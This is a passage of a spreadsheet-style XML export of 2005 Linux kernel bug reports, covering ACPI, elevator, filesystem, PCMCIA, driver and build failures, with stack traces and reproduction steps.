    <t>Distribution: SLES 9 SP1 ---------------------------------- Hardware Environment: 2 way, Intel(R) XEON(TM) CPU 2.00GHz, 4 GB RAM Network driver Broadcom Corporation NetXtreme BCM5703X Gigabit Ethernet SCSi Driver: SCSI storage controller: LSI Logic / Symbios Logic 53c1030 PCI-X Fusion-MPT Dual Ultra320 ) ---------------------------------- Software Environment: Linux Kernel: 2.6.13-rc5 + 2.6.13-rc5-mm1 ---------------------------------- Problem Description: On building kernel 2.6.13-rc5-mm1 with the existing config file[worked with earlier kernels]. Encountered this Kernel Panic with the message " Unable to handle kernel paging request at virtual address 00000010. I will attachi the Serial Console and Config file please have a look</t>
  </si>
  <si>
    <t>Could not acquire Global Lock, AE_NO_GLOBAL_LOCK</t>
  </si>
  <si>
    <t>2005-08-10 20:12 UTC</t>
  </si>
  <si>
    <t>2006-09-28 13:18 UTC</t>
  </si>
  <si>
    <t>Dmesg output at boot. Could not acquire Global Lock, AE_NO_GLOBAL_LOCK This is the stack trace: ACPI: Subsystem revision 20050408 [&lt;c02584ae&gt;] acpi_ev_acquire_global_lock+0x40/0x111 [&lt;c026264d&gt;] acpi_ex_acquire_global_lock+0x3f/0x85 [&lt;c025b847&gt;] acpi_ex_read_data_from_field+0x1a7/0x1fd [&lt;c0267908&gt;] acpi_ns_get_type+0x79/0x86 [&lt;c02636ca&gt;] acpi_ex_resolve_node_to_value+0x216/0x2f8 [&lt;c025c4cd&gt;] acpi_ex_resolve_to_value+0xad/0xf8 [&lt;c0252f0d&gt;] acpi_ds_get_predicate_value+0xb5/0x1fc [&lt;c0271c93&gt;] acpi_ut_trace_ptr+0x2c/0x30 [&lt;c02536de&gt;] acpi_ds_exec_end_op+0x4ae/0x530 [&lt;c026aaf1&gt;] acpi_ps_parse_loop+0x69e/0xa3e [&lt;c026af50&gt;] acpi_ps_parse_aml+0xbf/0x2cb [&lt;c026b8e6&gt;] acpi_psx_execute+0x1e2/0x290 [&lt;c02673d9&gt;] acpi_ns_execute_control_method+0xdf/0xfe [&lt;c02672c5&gt;] acpi_ns_evaluate_by_handle+0xe2/0x117 [&lt;c026705b&gt;] acpi_ns_evaluate_relative+0x14b/0x1a6 [&lt;c0272092&gt;] acpi_ut_evaluate_object+0x50/0x1ec [&lt;c0250500&gt;] acpi_os_wait_semaphore+0x184/0x196 [&lt;c025a4de&gt;] acpi_ev_match_prw_and_gpe+0x46/0x109 [&lt;c02695fd&gt;] acpi_ns_walk_namespace+0xc0/0x187 [&lt;c025acfe&gt;] acpi_ev_create_gpe_block+0x145/0x241 [&lt;c025a498&gt;] acpi_ev_match_prw_and_gpe+0x0/0x109 [&lt;c02731ec&gt;] acpi_ut_acquire_mutex+0x9c/0xe3 [&lt;c025aeab&gt;] acpi_ev_gpe_initialize+0xb1/0x226 [&lt;c02569d5&gt;] acpi_ev_initialize_events+0x8d/0xda [&lt;c0273ae6&gt;] acpi_enable_subsystem+0x127/0x18a [&lt;c0715c10&gt;] acpi_bus_init+0x35/0xdf [&lt;c0715d30&gt;] acpi_init+0x76/0xe8 [&lt;c06fe8db&gt;] do_initcalls+0x2b/0xc0 [&lt;c07270aa&gt;] sock_init+0x2a/0x40 [&lt;c01002a0&gt;] init+0x0/0x110 [&lt;c01002cf&gt;] init+0x2f/0x110 [&lt;c0101378&gt;] kernel_thread_helper+0x0/0x18 [&lt;c010137d&gt;] kernel_thread_helper+0x5/0x18 exutils-0229 [21] ex_acquire_global_lock: Could not acquire Global Lock, AE_NO_GLOBAL_LOCK evgpeblk-1016 [06] ev_create_gpe_block : GPE 00 to 1F [_GPE] 4 regs on int 0x9 evgpeblk-1024 [06] ev_create_gpe_block : Found 7 Wake, Enabled 0 Runtime GPEs in this block</t>
  </si>
  <si>
    <t>Switching elevator on-the-fly causes NULL pointer dereference oops</t>
  </si>
  <si>
    <t>2005-08-11 10:40 UTC</t>
  </si>
  <si>
    <t>Kerin Millar</t>
  </si>
  <si>
    <t>2005-11-13 12:20 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux (base system v1.6.13, stable "x86" except for the use of gcc-3.4.4), kernel 2.6.13-rc6 Hardware Environment: Compaq Proliant ML370 G3 Software Environment: LVM2 / RAID5 (md) | amavisd-new, apache2, bind, clamd, courier-imapd, isc-dhcp, hylafax, mysql, (open)ntpd, postfix, samba, squid, (open)sshd, syslog-ng, vixie-cron, zope Problem Description: Firstly, note that the kernel was a stock 2.6.13-rc6 kernel except that PAGE_OFFSET was modified to be 0xB0000000(UL) instead of 0xC0000000(UL) in accordance with my usual practice (the machine has exactly 1G of RAM). The machine currently has 4 SCSI hard disks where sda/sdb/sdc are participating in a RAID5 array and sdd is independent. The kernel is set to boot with "deadline" as the default elevator. It had been running for several days whereupon I decided that I wanted to test the CFQ elevator. So I switched each SCSI disk sequentially to use CFQ via the sysfs filesystem. Thereafter it ran with CFQ for about 1.5 days then I decided to switch them back to the deadline elevator using the same method. At that point the ooops occurred. I believe it happened after changing the final device (/dev/sdd) although I cannot recall exactly. It was done via ssh and I only noticed initially that I was kicked out of root mode back to my regular account from which I had su'd. Then I realised that things were amiss, checked dmesg and noticed the oops: --- Unable to handle kernel NULL pointer dereference at virtual address 00000008 printing eip: b023424f *pde = 00000000 Oops: 0000 [#1] SMP Modules linked in: iptable_filter ip_tables hangcheck_timer CPU: 1 EIP: 0060:[&lt;b023424f&gt;] Not tainted VLI EFLAGS: 00010286 (2.6.13-rc6) EIP is at deadline_exit_queue+0x7/0x40 eax: 00000008 ebx: 00000000 ecx: b022fd40 edx: b0234248 esi: b5ef9700 edi: b03da080 ebp: b03da4e0 esp: d93cdef4 ds: 007b es: 007b ss: 0068 Process bash (pid: 32727, threadinfo=d93cc000 task=ef26a020) Stack: efccb0c0 b022a0a6 efcde344 b022a797 b0229ed3 00000000 efccb0c0 d93cdf30 d93cdf31 b03da335 efcde344 b022a8b1 00000000 00000000 00000004 00716663 00000000 00000000 00000000 b022a80d efcde344 c1ee0000 b03930a0 b022ea2e Call Trace: [&lt;b022a0a6&gt;] elevator_exit+0x27/0x3e [&lt;b022a797&gt;] elevator_switch+0xa3/0x119 [&lt;b0229ed3&gt;] elevator_find+0x60/0x67 [&lt;b022a8b1&gt;] elv_iosched_store+0xa4/0xe5 [&lt;b022a80d&gt;] elv_iosched_store+0x0/0xe5 [&lt;b022ea2e&gt;] queue_attr_store+0x2c/0x3b [&lt;b018ddd5&gt;] flush_write_buffer+0x2e/0x3e [&lt;b018de1d&gt;] sysfs_write_file+0x38/0x5f [&lt;b015434c&gt;] vfs_write+0xd7/0x178 [&lt;b0154498&gt;] sys_write+0x41/0x6a [&lt;b0102b67&gt;] sysenter_past_esp+0x54/0x75 Code: 25 95 fa ff 31 d2 85 c0 74 03 8b 50 14 89 d0 c3 8b 42 2c e8 db 94 fa ff 31 d2 85 c0 74 03 8b 50 14 89 d0 c3 53 8b 58 04 8d 43 08 &lt;39&gt; 43 08 75 20 8d 43 10 39 43 10 75 22 8b 43 48 e8 21 71 f0 ff --- I rebooted the machine (over ssh) but it did come up successfully. Unfortunately, the machine was meddled with before I physically attended to it today but I know that: (1) Some minor filesystem corruption resulted with root and /home filesystems (2) The root filesystem corruption (at least) caused problems with /etc/init.d/local (corrected by touch /forcefsck and reboot) (3) The home filesystem corruption took mail services out of action (again, corrected by touch /forcefsck and reboot) With regard to (3), here's the final entry in /var/log/mail.log generated by postfix that hints at the kind of corruption caused (this was occurring consistently for all delivery attempts until fsck fixed things up): --- Aug 11 14:31:42 serve postfix/local[7129]: 9D3721001A: to=&lt;sysadmin@recruit2recruit.net&gt;, relay=local, delay=0, status=bounced (maildir delivery failed: link to /home/sysadmin/.maildir/new/1123767102.Vfd01I11051c.serve.r2r.local: Invalid cross-device link) --- Here is how the filesystem mounts were at the time of the oops: --- /dev/sda3 on / type ext3 (rw,errors=remount-ro) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) udev on /dev type tmpfs (rw,nosuid) devpts on /dev/pts type devpts (rw) /dev/sda1 on /boot type ext3 (rw) /dev/vg/usr on /usr type ext3 (rw,nodev,noatime,barrier=1) /dev/vg/home on /home type ext3 (rw,nosuid,nodev,noatime,barrier=1) /dev/vg/shares on /shares type ext3 (rw,noexec,nosuid,nodev,noatime,barrier=1) /dev/vg/opt on /opt type ext3 (rw,nosuid,nodev,noatime,barrier=1) /dev/vg/var on /var type ext3 (rw,nodev,noatime,barrier=1) /dev/vg/tmp on /tmp type ext3 (rw,nosuid,nodev,barrier=1) /dev/vg/squid on /var/cache/squid type ext3 (rw,noexec,nosuid,nodev,noatime,data=writeback,barrier=1) /dev/vg/backup on /mnt/backup type ext3 (rw,nosuid,nodev,noatime,barrier=1) none on /dev/shm type tmpfs (rw) usbfs on /proc/bus/usb type usbfs (rw,devmode=0664,devgid=85) /dev on /mnt/backup/chroot/dev type none (rw,bind) /usr/portage on /mnt/backup/chroot/usr/portage type none (rw,bind) none on /mnt/backup/chroot/proc type proc (rw) --- Steps to reproduce: Obviously, I'm not keen to attempt to reproduce this! But the circumstances that led to this bug were: (1) Boot with elevator=deadline and run for a while. (2) Switch block devices to CFQ via sysfs and run for a while. (3) Switch block devices back to deadline ... (4) Oops and minor filesystem corruption. I'll attach information concerning my system to this bug.</t>
  </si>
  <si>
    <t>Battery not recognized if removed and put back</t>
  </si>
  <si>
    <t>2.6.12.4 patch acpi-20050729-2.6.12.patch</t>
  </si>
  <si>
    <t>2005-08-12 07:03 UTC</t>
  </si>
  <si>
    <t>2006-05-16 08:43 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing Hardware Environment: Sony Vaio PCG-FR 215 E / Phoenix bios Problem Description: The battery is correctly recognized at boot, but then if I remove it and put it back it is not recognized anymore, I have then: [brice@TuxBox:~]$ cat /proc/acpi/battery/BAT1/state present: no [brice@TuxBox:~]$ Best regards, Brice Steps to reproduce: remove the battery and put it back</t>
  </si>
  <si>
    <t>IBM ACPI doesn't seem to work with ACPI patches 2005-07-28 for kernel 2.6.12.4</t>
  </si>
  <si>
    <t>2.6.12.4</t>
  </si>
  <si>
    <t>2005-08-13 06:28 UTC</t>
  </si>
  <si>
    <t>Martin Steigerwald</t>
  </si>
  <si>
    <t>Distribution: Debian Etch with some parts of unstable Hardware Environment: IBM ThinkPad T23, P3 1.13 GHz, 384 MB RAM Software Environment: 2.6.12.4 + ACPI patches 2005-07-28 + some hibernate scripts and ACPI events Problem Description: Kernel module "ibm-acpi" doesn't seem to work with ACPI patches 2005-07-28. root@deepdance: -&gt; modprobe ibm-acpi FATAL: Error inserting ibm_acpi (/lib/modules/2.6.12.4-tp23-acpi-2005-07-29/kernel/drivers/acpi/ibm_acpi.ko): No such device This is with 2.6.12.4 compiled with GCC 4.0.1: root@deepdance: -&gt; cat /proc/version Linux version 2.6.12.4-tp23-acpi-2005-07-29 (root@deepdance) (gcc version 4.0.1 (Debian 4.0.1-2)) #1 Sat Aug 13 13:18:05 CEST 2005 It used to work before on 2.6.12.2 without ACPI patches. It also works okay with 2.6.12.4 without ACPI patches (which I am now using) Steps to reproduce: 1) Get plain kernel 2.6.12 sources 2) apply 2.6.12.4 patch 3) apply ACPI patches 2005-07-28 for 2.6.12.4 to it 4) I had a T23 5) I used a hand crafted kernel config file (I will attach this) 6) I used make-kpkg 7) reboot 8) do "modprobe ibm-acpi" Maybe step 4 to 6 are not required to reproduce the problem. I will be keeping the Debian kernel packages I produced for a while. If you like me to try something out, want those kernel packages or need further information drop me a note. Regards, Martin Steigerwald</t>
  </si>
  <si>
    <t>Cardbus ioports fails. inb(), inw() and ind() cause an entire system hang and pci bus error.</t>
  </si>
  <si>
    <t>2005-08-13 07:57 UTC</t>
  </si>
  <si>
    <t>James Courtier-Dutton</t>
  </si>
  <si>
    <t>2005-11-06 14:30 UTC</t>
  </si>
  <si>
    <t>Distribution: gentoo Hardware Environment: Compaq NC6000 laptop. (but fails on all laptops.) Software Environment: Linux Problem Description: Cardbus ioports fails. inb(), inw() and ind() cause an entire system hang and pci bus error. Steps to reproduce: use the attached ca0106_main.c file and replace ./linux/sound/pci/ca0106/ca0106_main.c Compile the ALSA sound modules and include the ca0106 module in debug mode. Installing alsa-driver separately might be required. configure --with-cards=ca0106 --with-debug=basic make make install modprobe snd-ca0106 cat /proc/asound/cards cat /proc/asound/card0/ca0106_regs32 (ca0106_regs32 will only appear in debug mode) This causes the system to hang. If one removed the cardbus card, the system continues on again. I am attaching two files. Each of these files can be read with "lspci -Ffilename" so one can use lspci to dump any information that might be useful. One of the files linux.txt is using lspci in Linux, the win32.txt is the equivalent in windows, where the cardbus card functions. There must be something wrong with the way ioport resources are being assigned in the PCI config registers. Can anybody help?</t>
  </si>
  <si>
    <t>intelfb - do not keep console resolution</t>
  </si>
  <si>
    <t>2005-08-13 19:54 UTC</t>
  </si>
  <si>
    <t>2005-08-31 01:09 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing Hardware Environment: P4 2.4GHz,1GB RAM, integrated i865 graphics card, Intel D865GBF Desktop Board Software Environment: text console,X Problem Description: intelfb driver do not keep resolution set with fbset after switching to another console and back. resources: bug 4738 motherboard: http://www.intel.com/design/motherbd/bf/index.htm Steps to reproduce: initial options: tty1,tty2 - 1024x768-60 1) tty1 - fbset after booting (1024x768-60) 2) tty1 - fbset 800x600-100 tty1: 800x600-100 3) swith to tty2, swith to tty1 tty1: 1024x768-60 (the same resolution as default from kernel booting)</t>
  </si>
  <si>
    <t>acpi_video_device_write_state() busted</t>
  </si>
  <si>
    <t>2005-08-13 20:01 UTC</t>
  </si>
  <si>
    <t>Ariel T. Glenn</t>
  </si>
  <si>
    <t>2005-09-09 09:17 UTC</t>
  </si>
  <si>
    <t>Distribution:FC4, vanilla kernel NOT from FC4. Hardware Environment: Dell XPS Gen 2 laptop Software Environment: most modules unloaded, running from console, most services shut down Problem Description: acpi_video_device_write_state() calls acpi_video_device_set_state() which calls acpi_evaluate_integer() with fourth arg NULL, causing an error so the set state call bails. Steps to reproduce: echo 0x20001f &gt; /proc/acpi/debug_level echo 0x80000001 &gt; /proc/acpi/video/VID/LCD/state check in log; you'll see something like this: Aug 13 18:31:03 localhost kernel: acpi_video-0782 [13] acpi_video_device_writ: ----Entry Aug 13 18:31:03 localhost kernel: acpi_video-0302 [14] acpi_video_device_set_: ----Entry Aug 13 18:31:03 localhost kernel: acpi_utils-0250 [15] acpi_evaluate_integer : ----Entry Aug 13 18:31:03 localhost kernel: acpi_utils-0253 [15] acpi_evaluate_integer : ----Exit- ****Exception****: AE_BAD_PARAMETER Aug 13 18:31:03 localhost kernel: acpi_video-0307 [14] acpi_video_device_set_: ----Exit- 0000000000001001 Aug 13 18:31:03 localhost kernel: acpi_video-0797 [13] acpi_video_device_writ: ----Exit- FFFFFFFFFFFFFFF2 Here's the call that's bad: status = acpi_evaluate_integer(device-&gt;handle, "_DSS", &amp;args, NULL); (around line 305 in video.c) Here's why it's bad: acpi_status acpi_evaluate_integer ( acpi_handle handle, acpi_string pathname, struct acpi_object_list *arguments, unsigned long *data) ... ACPI_FUNCTION_TRACE("acpi_evaluate_integer"); if (!data) return_ACPI_STATUS(AE_BAD_PARAMETER); (around line 240 in util.c) Since I don't know whether there should be an actual argument passed or whether acpi_evaluate_integer shouldn't do that check, I didn't attach a patch. I checked in http://ftp.kernel.org/pub/linux/kernel/people/lenb/acpi/patches/release/2.6.13/broken-out/ but didn't find a fix for this. I'm not adding attachments unless someone thinks they really need them.</t>
  </si>
  <si>
    <t>kernel preemption breaks in several ways</t>
  </si>
  <si>
    <t>2005-08-14 00:24 UTC</t>
  </si>
  <si>
    <t>2007-11-29 08:24 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing Hardware Environment: TP 600X Software Environment: Problem Description: I get the following errors/problems only with pre-emption enabled in the kernel: 1. pcmcia 'unable to remove socket power" errors (Bug #5061). Happens if full preemption is enabled ('low-latency desktop' as preemption model + PREEMPT_BKL), but not with mild preemption ('voluntary kernel preemption'). 2. S3 hangs upon going to sleep (Bug #5037). It happens regularly with full pre-emption, not with 'no forced preemption', and probably not with mild preemption (haven't been running that kernel for long enough to be sure). 3. errors like "os_wait_semaphore : Failed to acquire" (Bug #5008). Happens with full or mild preemption, but not with voluntary preemption. Steps to reproduce:</t>
  </si>
  <si>
    <t>[Patch] asus_acpi hotkeys do not work on Samsung P30</t>
  </si>
  <si>
    <t>2005-08-15 07:26 UTC</t>
  </si>
  <si>
    <t>Peter Baumann</t>
  </si>
  <si>
    <t>Distribution: debian sarge Hardware Environment: Samsung P30 Software Environment: Problem Description: I get an OOPS if I try to load asus_acpi as modul. After a little googling I find this link with the a patch wich solved my problem. Applying this made my hotkeys work again. http://sourceforge.net/mailarchive/message.php?msg_id=12203231</t>
  </si>
  <si>
    <t>Cardbus: PCMCIA or PCI bug ioport bug.</t>
  </si>
  <si>
    <t>2005-08-15 16:03 UTC</t>
  </si>
  <si>
    <t>2005-11-15 14:20 UTC</t>
  </si>
  <si>
    <t>linux-pcmcia</t>
  </si>
  <si>
    <t>Please see bug#5057 for details. http://bugzilla.kernel.org/show_bug.cgi?id=5057 I was not sure if this was a pcmcia bug or a pci bug, so have raised a bug against both.</t>
  </si>
  <si>
    <t>filename case insensitivity bug</t>
  </si>
  <si>
    <t>2005-08-15 22:06 UTC</t>
  </si>
  <si>
    <t>2005-09-23 11:27 UTC</t>
  </si>
  <si>
    <t>Distribution: debian-amd64 Steps to reproduce: run the following shell script from some directory on JFS volume which is insensitive to case of filenames. ==== start of testcase.sh ==== touch testfile mv testfile Testfile mkdir mydir mv testfile mydir/Testfile ls mv mydir/Testfile ./ ==== end of testcase.sh ==== A sample output is $ sh testcase.sh mv: `testfile' and `Testfile' are the same file mydir mv: `mydir/Testfile' and `./Testfile' are the same file Please note that the last error should not happen. According to the output of "ls" command, there no "./testfile" or "./Testfile" file in the current directory. So the command "mv mydir/Testfile ./" should succeed but it does not. Somehow JFS reports that there is file "./Testfile" in the current directory while there is no such file.</t>
  </si>
  <si>
    <t>2.6.12.5</t>
  </si>
  <si>
    <t>Possible file date underflow on ext2/3 filesystems on amd64 systems</t>
  </si>
  <si>
    <t>2.6.12-gentoo-r6</t>
  </si>
  <si>
    <t>2005-08-17 04:26 UTC</t>
  </si>
  <si>
    <t>Carlos Silva</t>
  </si>
  <si>
    <t>2009-01-17 19:44 UTC</t>
  </si>
  <si>
    <t>Markus Rechberger</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: 64 bit machine Problem Description: A user at gentoo buzilla(1) reported that some files that he change the date to 1 Jan 1970 for archiving purposes, after umount and re-mounting the partition, the files would have the date changed to 7 Feb 2106. On the report, he only test this on ext3 filesystem but i also reproduce it in ext2 filesystems. If any mor info is needed just ask. Steps to reproduce: 1. Compile and install a kernel with ext2/3 support 2. mount &lt;ext2/3_partition&gt; 3. cd &lt;ext2/3_partition&gt; 4. touch -d 01/01/1907 test_file 5. cd .. 6. umount &lt;ext2/3_partition&gt; 7. mount &lt;ext2/3_partition&gt; 8. ls -l &lt;ext2/3_partition&gt;/test_file The file will report 7 Feb 2106. (1) http://bugs.gentoo.org/show_bug.cgi?id=101723</t>
  </si>
  <si>
    <t>Misbehaviour of "acpi_ut_callocate" in file "utilities/utalloc.c"</t>
  </si>
  <si>
    <t>2005-08-18 15:59 UTC</t>
  </si>
  <si>
    <t>skyhover</t>
  </si>
  <si>
    <t>2006-02-02 15:12 UTC</t>
  </si>
  <si>
    <t>Problem Description: When the parameter "size" is zero, it returns NULL. But such a behaviour is not consistent with the standard "calloc", which should return non-NULL. It is also not consistent with "acpi_ut_allocate" in the same file. NULL is usually used to indicate a real memory allocation failure. Suggestion for fix: replace "return_PTR (NULL);" with "size = 1", just as in "acpi_ut_allocate".</t>
  </si>
  <si>
    <t>atmel_cs needs to keep firmware</t>
  </si>
  <si>
    <t>2.6.13-rc6swsusp1</t>
  </si>
  <si>
    <t>2005-08-19 07:57 UTC</t>
  </si>
  <si>
    <t>Daniel Barlow</t>
  </si>
  <si>
    <t>2009-03-18 08:28 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: x86 laptop pentium M compaq nc4000 Software Environment: pcmcia_cs (not udev) Problem Description: Machine hangs on swsusp suspend to disk if 3com 3CRSHPW196 (atmel_cs) is in use, after printing these two lines Yenta O2: res at 0x94/0xD4: 00/ea Yenta O2: enabling read prefetch/write burst Some investigation with Magic Sysrq indicates that it stopped in the middle of swsusp_write -&gt; device_resume ... -&gt; request_firmware: presumably the pcmcia device got resumed before the disk it wants to load its firmware from Steps to reproduce # # -- insert a 3com network card and wait for modules to load -- # echo platform &gt;/sys/power/disk # echo disk &gt;/sys/power/state</t>
  </si>
  <si>
    <t>Data abort broken on ARM6 and ARM7</t>
  </si>
  <si>
    <t>2005-08-21 03:00 UTC</t>
  </si>
  <si>
    <t>Timothy Baldwin</t>
  </si>
  <si>
    <t>2005-10-31 11:30 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: ARM610 Problem Description: All data aborts are treated as read accesses. Steps to reproduce: Boot kernel on any ARM610 or ARM710 machine. Kernel fails to load an ELF init.</t>
  </si>
  <si>
    <t>_CRS parser doesn't recognise generic register type</t>
  </si>
  <si>
    <t>2005-08-21 09:57 UTC</t>
  </si>
  <si>
    <t>2006-02-02 15:08 UTC</t>
  </si>
  <si>
    <t>ACPI_RDESC_TYPE_GENERAL_REGISTER is defined in aclocal.h, but doesn't seem to be parsed in rscalc.c. This means that devices with registers defined don't appear to show up acpi pnp dumps.</t>
  </si>
  <si>
    <t>lost ticks - hang check - after loading the CPU</t>
  </si>
  <si>
    <t>2005-08-21 12:47 UTC</t>
  </si>
  <si>
    <t>Nathan Becker</t>
  </si>
  <si>
    <t>2010-01-05 00:58 UTC</t>
  </si>
  <si>
    <t>Distribution: Slamd64 Hardware Environment: AMD Athlon64 X2 4800+ Gigabyte GA-K8NXP-SLI motherboard eVGA NVIDIA 6600GT PCI express Software Environment: x86_64 kernel target compiled from vanilla 2.6.12.5 kernel source x.org, nv driver (open source NVIDIA 2D accelerator driver) Problem Description: The clock begins to run fast as soon as the CPU is loaded with a mathematical calculation. Kernel dmesg gives different messages depending on if in X windows or just at the console. At the console the message is: Losing some ticks... checking if CPU frequency changed. In X-Windows an additional message is warning: many lost ticks. Your time source seems to be instable or some driver is hogging interupts rip default_idle+0x20/0x30 It might be possible to get that second message while only in console eventually, but I haven't been able to do it. Also, if hangcheck is turned on then I get a huge number of Hangcheck messages. At first glance this might just sound like an annoying problem where the system clock is wrong. However, it is more than just wrong system time. After running for a while the clock is running very fast. The keyboard repeat delay depends on the system clock being accurate, so once it is running fast then it is almost impossible to type in X-windows. Typing in the console does not seem to be affected. A workaround I have come up with for the typing problem in X is to increase the key repeat delay to the max: xset r rate 1000 30 Even this workaround eventually fails as the clock continues to speed up. Steps to reproduce: Run anything that uses a lot of CPU. Wait a while. May take 30 minutes to an hour to start to get bad.</t>
  </si>
  <si>
    <t>Enhancement Request: r8169 Driver update to support Linksys EG1032 v3 Instant Gigabit Network Adaptor</t>
  </si>
  <si>
    <t>2005-08-21 20:32 UTC</t>
  </si>
  <si>
    <t>Christiaan Lutzer</t>
  </si>
  <si>
    <t>2005-09-18 16:15 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 3 Hardware Environment: Soyo KT600/AMD Sempron 1800 Software Environment: Er, Fedora Core 3 Problem Description: The Linksys EG1032 v3 Instant Gigabit Network Adaptor was incorrectly identified as a sk98lin device. The card uses a Realtek chipset: RTL8169S-32. So, obviously the sk98lin driver didn't work. What's more, the r8169 driver did not work either. I grabbed the kernel sources for 2.6.12.5 and added one line to r8169.c. I changed: static struct pci_device_id rtl8169_pci_tbl[] = { {0x10ec, 0x8169, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0}, {0x1186, 0x4300, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0}, {0,}, }; To: static struct pci_device_id rtl8169_pci_tbl[] = { {0x10ec, 0x8169, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0}, {0x1186, 0x4300, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0}, {0x1737, 0x1032, PCI_ANY_ID, 0x0024, 0, 0, 0}, {0,}, }; Now, I did my testing against the 2.6.12-1.1372_FC3 Kernel (because I'm running FC3). However, I noticed the rtl8169_pci_tbl in that kernel, and 2.6.12.5 are the same, so the patch *should* apply (no pun intended). I created a ``diff -u'' patch for linux-2.6.12.5/drivers/net/r8169.c: --- r8169.c 2005-08-21 22:04:51.000000000 -0400 +++ r8169_fixed.c 2005-08-21 22:02:05.000000000 -0400 @@ -176,6 +176,7 @@ static struct pci_device_id rtl8169_pci_tbl[] = { {0x10ec, 0x8169, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0}, {0x1186, 0x4300, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0}, + {0x1737, 0x1032, PCI_ANY_ID, 0x0024, 0, 0, 0}, {0,}, }; NB: You'll notice that the subdevice field is not PCI_ANY_ID. This is critical since the EG1032v2 cards don't use the Realtek chipset--they use the Syskonnect chipset, and hence the sk98lin driver. I took a look at that driver while writing this bug report, and most likely, (the royal) we'll have to change it to not apply to all Linksys Gigabit Adaptors: (skge.c) static struct pci_device_id skge_pci_tbl[] = { { PCI_VENDOR_ID_3COM, 0x1700, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0 }, { PCI_VENDOR_ID_3COM, 0x80eb, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0 }, { PCI_VENDOR_ID_SYSKONNECT, 0x4300, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0 }, { PCI_VENDOR_ID_SYSKONNECT, 0x4320, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0 }, { PCI_VENDOR_ID_DLINK, 0x4c00, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0 }, { PCI_VENDOR_ID_MARVELL, 0x4320, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0 }, #if 0 /* don't handle Yukon2 cards at the moment -- mlindner@syskonnect.de */ { PCI_VENDOR_ID_MARVELL, 0x4360, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0 }, { PCI_VENDOR_ID_MARVELL, 0x4361, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0 }, #endif { PCI_VENDOR_ID_MARVELL, 0x5005, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0 }, { PCI_VENDOR_ID_CNET, 0x434e, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0 }, { PCI_VENDOR_ID_LINKSYS, 0x1032, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0 }, { PCI_VENDOR_ID_LINKSYS, 0x1064, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0 }, { 0, } }; You'll notice the line, { PCI_VENDOR_ID_LINKSYS, 0x1032 } will screw up the v3 cards. I had to physically remove my sk98lin driver from my system to get the card to work. From what I can tell, we can change the PCI_ANY_ID for the 1032 in this case (I'm not sure about the 64 case) to 0x0015: http://pci-ids.ucw.cz/iii/iii.php?i=17371032 Then, the sk98lin driver will only support the v2 card, the r8169 driver will support the v3 card. Wow, this is long winded, I hope this is an appropriate bug report. Please let me know if you need anything else from me. Christiaan Lutzer &lt;mythtv.lutzer@gmail.com&gt; Steps to reproduce:</t>
  </si>
  <si>
    <t>2.6.13-rc6-mm1</t>
  </si>
  <si>
    <t>Failed to build kernel 2.6.13-rc6 with mm1 patch on OpenPower system</t>
  </si>
  <si>
    <t>2005-08-22 22:48 UTC</t>
  </si>
  <si>
    <t>2005-08-23 02:14 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: RHEL4 U1 with kernel 2.6.13-rc6-mm1 Hardware Environment: IBM OpenPower( CHRP IBM,9124-720 ) Software Environment: RHEL4 U1 Problem Description: Failed to build kernel 2.6.13-rc6 with mm1 patch with RHEL4 U1 on IBM OpenPower 720 system. Steps to reproduce: 1. download kernel 2.6.13-rc6 and 2.6.13-rc6-mm1 patch from www.kernel.org 2. extract the kernel and the mm1 patch 3. patch mm1 patch to kernel 2.6.13-rc6 source code. 4. build the kernel (make oldconfig ; make vmlinux) Addition information: Build log from console. ... LD [M] drivers/scsi/aic7xxx/aic79xx.o LD drivers/scsi/ibmvscsi/built-in.o CC [M] drivers/scsi/ibmvscsi/ibmvscsi.o drivers/scsi/ibmvscsi/ibmvscsi.c: In function `ibmvscsi_queuecommand': drivers/scsi/ibmvscsi/ibmvscsi.c:597: error: structure has no member named `timeout' make[3]: *** [drivers/scsi/ibmvscsi/ibmvscsi.o] Error 1 make[2]: *** [drivers/scsi/ibmvscsi] Error 2 make[1]: *** [drivers/scsi] Error 2 make: *** [drivers] Error 2</t>
  </si>
  <si>
    <t>2.6.13-rc6-mm2</t>
  </si>
  <si>
    <t>2.6.13-rc7 reintroduced already fixed hang at boot</t>
  </si>
  <si>
    <t>2.6.13-rc7</t>
  </si>
  <si>
    <t>2005-08-24 02:49 UTC</t>
  </si>
  <si>
    <t>Tero Roponen</t>
  </si>
  <si>
    <t>2005-08-27 00:15 UTC</t>
  </si>
  <si>
    <t>Commit 2ba84684e8cf6f980e4e95a2300f53a505eb794e (Revert PCIBIOS_MIN_IO changes for 2.6.13) made my ThinkPad-laptop hang at boot again. If I revert that commit, everything works again.</t>
  </si>
  <si>
    <t>cpufreq/powernowd is still not working  on  my AMD64x2 3800+</t>
  </si>
  <si>
    <t>2.6.13-rc7 32-bit</t>
  </si>
  <si>
    <t>2005-08-24 07:58 UTC</t>
  </si>
  <si>
    <t>etorix</t>
  </si>
  <si>
    <t>2007-02-01 13:44 UTC</t>
  </si>
  <si>
